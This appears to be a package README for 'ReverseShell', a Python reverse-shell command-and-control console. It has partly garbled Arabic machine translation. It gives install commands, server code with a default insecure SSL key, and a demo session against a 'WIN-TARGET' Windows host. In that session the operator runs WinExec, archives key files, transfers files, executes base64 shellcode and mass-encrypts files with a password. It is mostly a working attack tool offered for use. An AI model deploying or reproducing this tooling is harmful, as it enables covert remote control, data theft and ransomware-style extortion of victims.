ReverseShell
0.1.0 Python clients
تنفذ هذه الحزمة وحدة تحكم قذيفة عكسية متقدمة (تدعم: TCP ، UDP ، IRC ، HTTP و DNS).
Beep ، مهلة المقبس ، Sleep ، عملية الطفل ، عامل غير متزامن أو نهاية سلسلة الرسائل ، print )يمكنك قراءة مضاعفات POC لعميل Shell العكسي المكتوب في Python في دليل العملاء .
أضيف مفتاحًا عامًا وخاصًا لشهادة SSL الافتراضية ، وهو مفيد للاختبار ولكنه غير آمن ، قم بإنشاء شهادة خاصة بك لحماية بيانات TCP الخاصة بك .
تتطلب هذه الحزمة:
pip install ReverseShellpython3 -m ReverseShell --help
python3 ReverseShell.pyz -h
ReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
ReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.
ReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.
ReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.
ReverseShell -H -T -s -k " abcd " # To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
ReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.
ReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.
ReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.
ReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell. from ReverseShell import ReverseShellSocketTcp , ReverseShell
with ReverseShellSocketTcp ( address = ( "127.0.0.1" , 1337 ), ssl = False , cert = None , key = None , handler = ReverseShell ) as shellserver :
shellserver . serve_forever ()
# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
from ReverseShell import ReverseShellTcp , HttpReverseShell , partial
with ReverseShellTcp ( address = ( "127.0.0.1" , 1337 ), ssl = True , cert = "server.crt" , key = "server.key" , handler = partial ( HttpReverseShell , key = b"abcd" , encoding = "utf-8" )) as shellserver :
shellserver . serve_forever ()
# To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell. WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ call_library_function kernel32.dll WinExec "char *:calc.exe" "long:1"
Return value: 33
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ archive_files test.zip *.md *.key
Making archive...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ download_url http://google.com test.html
Done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ cd ..
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ update_environment
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ upload_file shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ download_file shellcode2.py
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ python3_exec print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ upload_file_compress shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ download_file_compress shellcode2.py
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ python3_exec_compress print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_file test.html
[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.
[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_file qwerty test.html
Encryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ decrypt_file qwerty test.html
Decryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_files qwerty *.html *.zip
Encryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ decrypt_files qwerty *.html *.zip
Decryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$
اهلا وسهلا بكم للمساهمة! يمكن للمبتدئين والمتوسطين والمتقدمين المساهمة في هذا المستودع. يمكن أن تساهم Python Movelopers ومسؤولي النظام ومسؤولي الشبكات وتطوير الويب وتطوير اللغة المترجمة. انظر القضايا لمعرفة ما نحتاجه.
usage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]
[--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]
Advanced reverse shell console.
options:
-h, --help show this help message and exit
--udp, -u Use UDP socket.
--tcp, -t Use TCP socket.
--multi-tcp, -T Create TCP socket for each command and responses.
--http, -H Use HTTP requests and responses.
--dns, -d Use DNS requests and responses.
--irc, -I Use IRC requests and response.
--no-color, --color, -C
Do not use color
--key KEY, -k KEY Add a key to encrypt with RC4.
--cert CERT, -c CERT SSL cert file.
--private PRIVATE, -P PRIVATE
SSL private key file.
--ip IP, -i IP IP address to start the ReverseShell server.
--port PORT, -p PORT UDP/TCP port to start the ReverseShell server.
--encoding ENCODING, -e ENCODING
The reverse shell encoding used by client.
--ssl, -s Use SSL over TCP socket.
--no-timeout, -m Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic
reverse shell like netcat.
مرخصة تحت GPL ، الإصدار 3.